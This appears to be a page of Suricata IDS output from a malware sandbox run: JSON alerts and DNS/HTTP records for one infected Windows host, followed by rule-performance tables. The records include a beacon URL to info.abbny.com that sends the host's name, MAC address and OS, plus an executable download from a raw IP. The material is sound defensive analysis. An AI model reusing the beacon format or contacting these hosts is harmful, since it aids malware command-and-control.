{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1853673158775049,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"ackng.com","rrtype":"SOA","ttl":23}}
{"timestamp":"2019-03-29T09:49:30.761257+0000","flow_id":1298613060410793,"pcap_cnt":112,"event_type":"dns","src_ip":"192.168.240.16","src_port":61488,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50892,"rrname":"ip.42.pl","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1298613060410793,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"ip.42.pl","rrtype":"CNAME","ttl":10460,"rdata":"42.pl"}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1298613060410793,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"42.pl","rrtype":"A","ttl":13904,"rdata":"79.98.145.42"}}
{"timestamp":"2019-03-29T09:49:34.063661+0000","flow_id":2125024897988781,"pcap_cnt":114,"event_type":"dns","src_ip":"192.168.240.16","src_port":50151,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63584,"rrname":"info.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":2125024897988781,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"info.beahh.com"}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":2125024897988781,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"beahh.com","rrtype":"SOA","ttl":1067}}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":365561480146109,"pcap_cnt":126,"event_type":"alert","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2811058,"rev":2,"signature":"ETPRO POLICY External IP Lookup - ip.42.pl","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":365561480146109,"pcap_cnt":126,"event_type":"alert","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":365561480146109,"pcap_cnt":126,"event_type":"http","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:34.548857+0000","flow_id":365561480146109,"pcap_cnt":129,"event_type":"fileinfo","src_ip":"79.98.145.42","src_port":80,"dest_ip":"192.168.240.16","dest_port":49428,"proto":"TCP","http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13},"app_proto":"http","fileinfo":{"filename":"\/raw","gaps":false,"state":"CLOSED","stored":false,"size":13,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:32.799257+0000","flow_id":2069512445506073,"pcap_cnt":131,"event_type":"dns","src_ip":"192.168.240.16","src_port":50174,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41144,"rrname":"jsonip.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.267500+0000","flow_id":2069512445506073,"pcap_cnt":132,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50174,"proto":"UDP","dns":{"type":"answer","id":41144,"rcode":"NOERROR","rrname":"jsonip.com","rrtype":"A","ttl":280,"rdata":"45.79.77.20"}}
{"timestamp":"2019-03-29T09:49:36.269304+0000","flow_id":657318608903160,"pcap_cnt":134,"event_type":"dns","src_ip":"192.168.240.16","src_port":49762,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43817,"rrname":"info.abbny.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":828206767675481,"pcap_cnt":141,"event_type":"alert","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":828206767675481,"pcap_cnt":141,"event_type":"http","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:36.274606+0000","flow_id":828206767675481,"pcap_cnt":143,"event_type":"fileinfo","src_ip":"45.79.77.20","src_port":80,"dest_ip":"192.168.240.16","dest_port":49429,"proto":"TCP","http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":301,"redirect":"https:\/\/jsonip.com\/","length":194},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":194,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.352934+0000","flow_id":657318608903160,"pcap_cnt":144,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49762,"proto":"UDP","dns":{"type":"answer","id":43817,"rcode":"NOERROR","rrname":"info.abbny.com","rrtype":"A","ttl":21599,"rdata":"153.92.4.49"}}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1865398420006455,"pcap_cnt":155,"event_type":"alert","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1865398420006455,"pcap_cnt":155,"event_type":"http","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png"}}
{"timestamp":"2019-03-29T09:49:36.712023+0000","flow_id":1865398420006455,"pcap_cnt":156,"event_type":"fileinfo","src_ip":"153.92.4.49","src_port":80,"dest_ip":"192.168.240.16","dest_port":49430,"proto":"TCP","http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":259},"app_proto":"http","fileinfo":{"filename":"\/e.png","gaps":false,"state":"CLOSED","stored":false,"size":259,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.824279+0000","flow_id":101940682844607,"pcap_cnt":164,"event_type":"tls","src_ip":"192.168.240.16","src_port":49431,"dest_ip":"45.79.77.20","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill","issuerdn":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill"}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1836617843986200,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1836617843986200,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1836617843986200,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"p

This file has been truncated. Go here to download in full.


keyword_perf.log - (17647 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 4/3/2019 -- 13:40:20
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            57649016        20483           20483           1590130         2814.00         2814.00         0.00           
  flow             84278108        29201           29201           436644          2886.00         2886.00         0.00           
  threshold        60290806        20483           7               83373           2943.00         5459.00         2942.00        
  content          122694926       5636            1433            6031896         21769.00        34778.00        17334.00       
  pcre             2187719         388             14              37552           5638.00         10747.00        5447.00        
  byte_test        2372395         711             207             106067          3336.00         3925.00         3094.00        
  byte_jump        370516          124             40              10187           2988.00         3107.00         2931.00        
  isdataat         26424           9               1               3417            2936.00         2621.00         2975.00        
  flowbits         24908657        4478            81              5649782         5562.00         72968.00        4320.00        
  urilen           227899          74              49              4473            3079.00         3115.00         3008.00        
  byte_extract     17475           4               4               9482            4368.00         4368.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            57649016        20483           20483           1590130         2814.00         2814.00         0.00           
  flow             84278108        29201           29201           436644          2886.00         2886.00         0.00           
  flowbits         19224706        4471            74              5238125         4299.00         3060.00         4320.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          32786510        2181            661             6031896         15032.00        19242.00        13202.00       
  pcre             324621          42              7               34528           7729.00         9621.00         7350.00        
  byte_test        2372395         711             207             106067          3336.00         3925.00         3094.00        
  byte_jump        349610          117             33              10187           2988.00         3132.00         2931.00        
  isdataat         26424           9               1               3417            2936.00         2621.00         2975.00        
  byte_extract     17475           4               4               9482            4368.00         4368.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         5683951         7               7               5649782         811993.00       811993.00       0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        60290806        20483           7               83373           2943.00         5459.00         2942.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          780777          204             107             33913           3827.00         3590.00         4088.00        
  pcre             524128          61              5               36747           8592.00         10370.00        8433.00        
  urilen           227899          74              49              4473            3079.00         3115.00         3008.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6661            2               2               3975            3330.00         3330.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          219360          40              8               14398           5484.00         8918.00         4625.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          30013           9               0               3516            3334.00         0.00            3334.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          87733231        2895            478             5811807         30305.00        75282.00        21410.00       
  pcre             1143905         270             0               37552           4236.00         0.00            4236.00        
  byte_jump        20906           7               7               3537            2986.00         2986.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          813867          213             114             9709            3820.00         3947.00         3675.00        
  pcre             129501          12              1               26803           10791.00        12866.00        10603.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          157673          43              32              5080            3666.00         3600.00         3860.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_connection
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13403           4               0               3763            3350.00         0.00            3350.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13485           4               4               3728            3371.00         3371.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3884            1               0               3884            3884.00         0.00            3884.00        
  pcre             22571           1               0               22571           22571.00        0.00            22571.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          42892           12              9               4610            3574.00         3661.00         3314.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          26150           8               4               3594            3268.00         3443.00         3094.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          34962           11              11              4150            3178.00         3178.00         0.00           
  pcre             42993           2               1               24598           21496.00        18395.00        24598.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3207            1               0               3207            3207.00         0.00            3207.00        
  ----------------------------------------------------------------------------------------------------------

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-perf.txt-2019-04-03-T-13-40-21-04032019.1339-network.pcap.txt - (66005 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 4/3/2019 -- 13:40:20. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820003      1        2        11655163     1.45   193      0        8964065     60389.45    0.00        60389.45   
  2        2803657      1        5        7967074      0.99   24       0        6263051     331961.42   0.00        331961.42  
  3        2008575      1        5        22230306     2.77   1787     0        6040488     12440.01    0.00        12440.01   
  4        2020865      1        3        31519817     3.93   178      0        5878575     177077.62   0.00        177077.62  
  5        2001583      1        16       207311777    25.87  13784    13784    5753140     15040.03    15040.03    0.00       
  6        2812091      1        1        5776240      0.72   6        1        5705798     962706.67   5705798.00  14088.40   
  7        2100540      1        12       5767310      0.72   33       0        5673724     174766.97   0.00        174766.97  
  8        2010935      1        3        118545537    14.79  13784    6699     5638918     8600.23     14803.11    2735.29    
  9        2809410      1        2        6390911      0.80   61       0        5520489     104769.03   0.00        104769.03  
  10       2812745      1        2        5398505      0.67   1        0        5398505     5398505.00  0.00        5398505.00 
  11       2102523      1        8        45356512     5.66   13806    0        5320190     3285.28     0.00        3285.28    
  12       2019822      1        7        6119547      0.76   61       0        5255332     100320.44   0.00        100320.44  
  13       2820158      1        2        24041039     3.00   131      0        2302893     183519.38   0.00        183519.38  
  14       2804508      1        2        1434947      0.18   3        1        1351541     478315.67   1351541.00  41703.00   
  15       2014958      1        1        1727023      0.22   40       0        1246698     43175.57    0.00        43175.57   
  16       2820157      1        2        21884150     2.73   131      0        1011453     167054.58   0.00        167054.58  
  17       2016112      1        3        3955169      0.49   176      0        790724      22472.55    0.00        22472.55   
  18       2802991      1        5        3058195      0.38   43       0        656847      71120.81    0.00        71120.81   
  19       2016502      1        2        2930641      0.37   160      0        544306      18316.51    0.00        18316.51   
  20       2024650      1        1        4519481      0.56   260      0        482739      17382.62    0.00        17382.62   
  21       2014473      1        5        3258807      0.41   196      0        428433      16626.57    0.00        16626.57   
  22       2802987      1        5        3491398      0.44   74       0        401283      47181.05    0.00        47181.05   
  23       2801929      1        7        3210303      0.40   46       0        400464      69789.20    0.00        69789.20   
  24       2819694      1        2        3312962      0.41   204      0        381670      16240.01    0.00        16240.01   
  25       2803027      1        6        3508396      0.44   59       0        380517      59464.34    0.00        59464.34   
  26       2801930      1        7        3205348      0.40   46       0        357170      69681.48    0.00        69681.48   
  27       2804907      1        3        1728986      0.22   29       0        346439      59620.21    0.00        59620.21   
  28       2804927      1        2        1972895      0.25   32       0        344011      61652.97    0.00        61652.97   
  29       2020569      1        1        966966       0.12   15       0        340578      64464.40    0.00        64464.40   
  30       2016503      1        2        2505419      0.31   160      0        336760      15658.87    0.00        15658.87   
  31       2819664      1        2        16974067     2.12   112      0        328910      151554.17   0.00        151554.17  
  32       2807400      1        3        1012539      0.13   15       0        328517      67502.60    0.00        67502.60   
  33       2805985      1        2        1000166      0.12   15       0        325988      66677.73    0.00        66677.73   
  34       2018982      1        2        945325       0.12   15       0        325594      63021.67    0.00        63021.67   
  35       2819930      1        2        17045021     2.13   112      0        323397      152187.69   0.00        152187.69  
  36       2022050      1        3        924894       0.12   15       0        323038      61659.60    0.00        61659.60   
  37       2808234      1        1        954083       0.12   15       0        322986      63605.53    0.00        63605.53   
  38       2016948      1        2        2316071      0.29   138      0        312161      16783.12    0.00        16783.12   
  39       2804911      1        3        2354615      0.29   40       0        297865      58865.38    0.00        58865.38   
  40       2016143      1        3        2492126      0.31   147      0        295761      16953.24    0.00        16953.24   
  41       2806802      1        2        9479220      1.18   452      0        257352      20971.73    0.00        20971.73   
  42       2804906      1        3        2104405      0.26   32       0        251086      65762.66    0.00        65762.66   
  43       2807130      1        4        3595003      0.45   215      0        227064      16720.94    0.00        16720.94   
  44       2016537      1        2        14944310     1.86   1032     1        225618      14480.92    57983.00    14438.73   
  45       2024771      1        1        10801849     1.35   1758     0        216847      6144.40     0.00        6144.40    
  46       2811745      1        4        886696       0.11   8        0        214208      110837.00   0.00        110837.00  
  47       2018789      1        3        351098       0.04   6        0        186364      58516.33    0.00        58516.33   
  48       2016855      1        2        377295       0.05   11       0        181304      34299.55    0.00        34299.55   
  49       2017552      1        6        14874246     1.86   1045     0        165532      14233.73    0.00        14233.73   
  50       2016854      1        3        388861       0.05   11       0        147275      35351.00    0.00        35351.00   
  51       2024829      1        2        3337365      0.42   160      0        145785      20858.53    0.00        20858.53   
  52       2023476      1        5        132644       0.02   1        0        132644      132644.00   0.00        132644.00  
  53       2815314      1        3        540737       0.07   5        0        127796      108147.40   0.00        108147.40  
  54       2827094      1        2        1124571      0.14   14       0        121474      80326.50    0.00        80326.50   
  55       2021749      1        6        135057       0.02   6        0        120846      22509.50    0.00        22509.50   
  56       2819857      1        1        434559       0.05   15       0        120312      28970.60    0.00        28970.60   
  57       2014819      1        3        199674       0.02   3        0        119854      66558.00    0.00        66558.00   
  58       2021432      1        2        119680       0.01   1        0        119680      119680.00   0.00        119680.00  
  59       2021434      1        2        119294       0.01   1        0        119294      119294.00   0.00        119294.00  
  60       2021586      1        3        119161       0.01   1        0        119161      119161.00   0.00        119161.00  
  61       2021433      1        2        117750       0.01   1        0        117750      117750.00   0.00        117750.00  
  62       2017748      1        6        2966427      0.37   196      0        117470      15134.83    0.00        15134.83   
  63       2024909      1        2        2792879      0.35   129      0        116382      21650.22    0.00        21650.22   
  64       2803139      1        3        180211       0.02   3        0        116041      60070.33    0.00        60070.33   
  65       2012981      1        5        187380       0.02   3        0        109779      62460.00    0.00        62460.00   
  66       2828748      1        2        323229       0.04   63       0        102383      5130.62     0.00        5130.62    
  67       2829607      1        1        88350        0.01   1        1        88350       88350.00    88350.00    0.00       
  68       2023671      1        4        912985       0.11   61       0        87797       14966.97    0.00        14966.97   
  69       2016141      1        5        75302        0.01   1        1        75302       75302.00    75302.00    0.00       
  70       2018316      1        4        166660       0.02   3        0        74766       55553.33    0.00        55553.33   
  71       2013352      1        4        249773       0.03   61       0        74002       4094.64     0.00        4094.64    
  72       2019714      1        10       73044        0.01   1        1        73044       73044.00    73044.00    0.00       
  73       2023672      1        4        890583       0.11   61       0        71566       14599.72    0.00        14599.72   
  74       2806561      1        5        38608936     4.82   13793    0        69515       2799.17     0.00        2799.17    
  75       2001330      1        8        5192050      0.65   1732     0        67563       2997.72     0.00        2997.72    
  76       2022896      1        5        67431        0.01   1        0        67431       67431.00    0.00        67431.00   
  77       2816530      1        2        66531        0.01   1        0        66531       66531.00    0.00        66531.00   
  78       2018241      1        2        277529       0.03   61       0        66233       4549.66     0.00        4549.66    
  79       2022550      1        16       65308        0.01   1        0        65308       65308.00    0.00        65308.00   
  80       2814978      1        2        81965        0.01   7        0        65048       11709.29    0.00        11709.29   
  81       2024776      1        1        275131       0.03   70       0        64873       3930.44     0.00        3930.44    
  82       2024848      1        2        181347       0.02   4        0        64849       45336.75    0.00        45336.75   
  83       2022830      1        2        64394        0.01   1        0        64394       64394.00    0.00        64394.00   
  84       2017190      1        6        64220        0.01   1        0        64220       64220.00    0.00        64220.00   
  85       2008120      1        4        107953       0.01   17       0        60882       6350.18     0.00        6350.18    
  86       2022940      1        2        60342        0.01   1        0        60342       60342.00    0.00        60342.00   
  87       2814888      1        2        198474       0.02   5        0        59519       39694.80    0.00        39694.80   
  88       2821615      1        2        188613       0.02   6        0        58964       31435.50    0.00        31435.50   
  89       2814979      1        2        76096        0.01   7        0        58471       10870.86    0.00        10870.86   
  90       2022552      1        2        4263863      0.53   210      0        58456       20304.11    0.00        20304.11   
  91       2022658      1        4        57034        0.01   1        0        57034       57034.00    0.00        57034.00   
  92       2015744      1        4        88455        0.01   12       1        55890       7371.25     55890.00    2960.45    
  93       2018005      1        6        70060        0.01   6        0        54730       11676.67    0.00        11676.67   
  94       2822886      1        2        102882       0.01   3        0        53938       34294.00    0.00        34294.00   
  95       2018959      1        3        233224       0.03   61       1        53354       3823.34     53354.00    2997.83    
  96       2811275      1        8        144775       0.02   4        0        51992       36193.75    0.00        36193.75   
  97       2021067      1        2        156764       0.02   4        0        51541       39191.00    0.00        39191.00   
  98       2018121      1        4        51210        0.01   1        0        51210       51210.00    0.00        51210.00   
  99       2022535      1        11       50127        0.01   1        0        50127       50127.00    0.00        50127.00   
  100      2008438      1        20       655361       0.08   15       0        49867       43690.73    0.00        43690.73   
  101      2810481      1        4        4010298      0.50   196      0        49766       20460.70    0.00        20460.70   
  102      2014701      1        12       229776       0.03   16       0        49742       14361.00    0.00        14361.00   
  103      2822213      1        2        63130        0.01   6        0        49515       10521.67    0.00        10521.67   
  104      2019103      1        4        944363       0.12   61       0        48854       15481.36    0.00        15481.36   
  105      2807385      1        5        291071       0.04   15       0        48751       19404.73    0.00        19404.73   
  106      2009897      1        14       87691        0.01   15       0        47974       5846.07     0.00        5846.07    
  107      2020421      1        2        883825       0.11   61       0        47331       14488.93    0.00        14488.93   
  108      2826256      1        2        341780       0.04   14       0        47014       24412.86    0.00        24412.86   
  109      2025142      1        2        181075       0.02   4        0        46986       45268.75    0.00        45268.75   
  110      2815481      1        6        169507       0.02   4        0        46644       42376.75    0.00        42376.75   
  111      2830124      1        1        46327        0.01   1        0        46327       46327.00    0.00        46327.00   
  112      2022270      1        2        46295        0.01   1        0        46295       46295.00    0.00        46295.00   
  113      2809306      1        4        3139546      0.39   217      0        45859       14467.95    0.00        14467.95   
  114      2021312      1        2        930117       0.12   61       0        45712       15247.82    0.00        15247.82   
  115      2019345      1        2        3321131      0.41   231      0        45707       14377.19    0.00        14377.19   
  116      2014353      1        6        222604       0.03   61       0        45219       3649.25     0.00        3649.25    
  117      2821561      1        2        298450       0.04   9        0        45091       33161.11    0.00        33161.11   
  118      2023464      1        2        864885       0.11   61       0        44638       14178.44    0.00        14178.44   
  119      2815749      1        2        151534       0.02   4        0        44366       37883.50    0.00        37883.50   
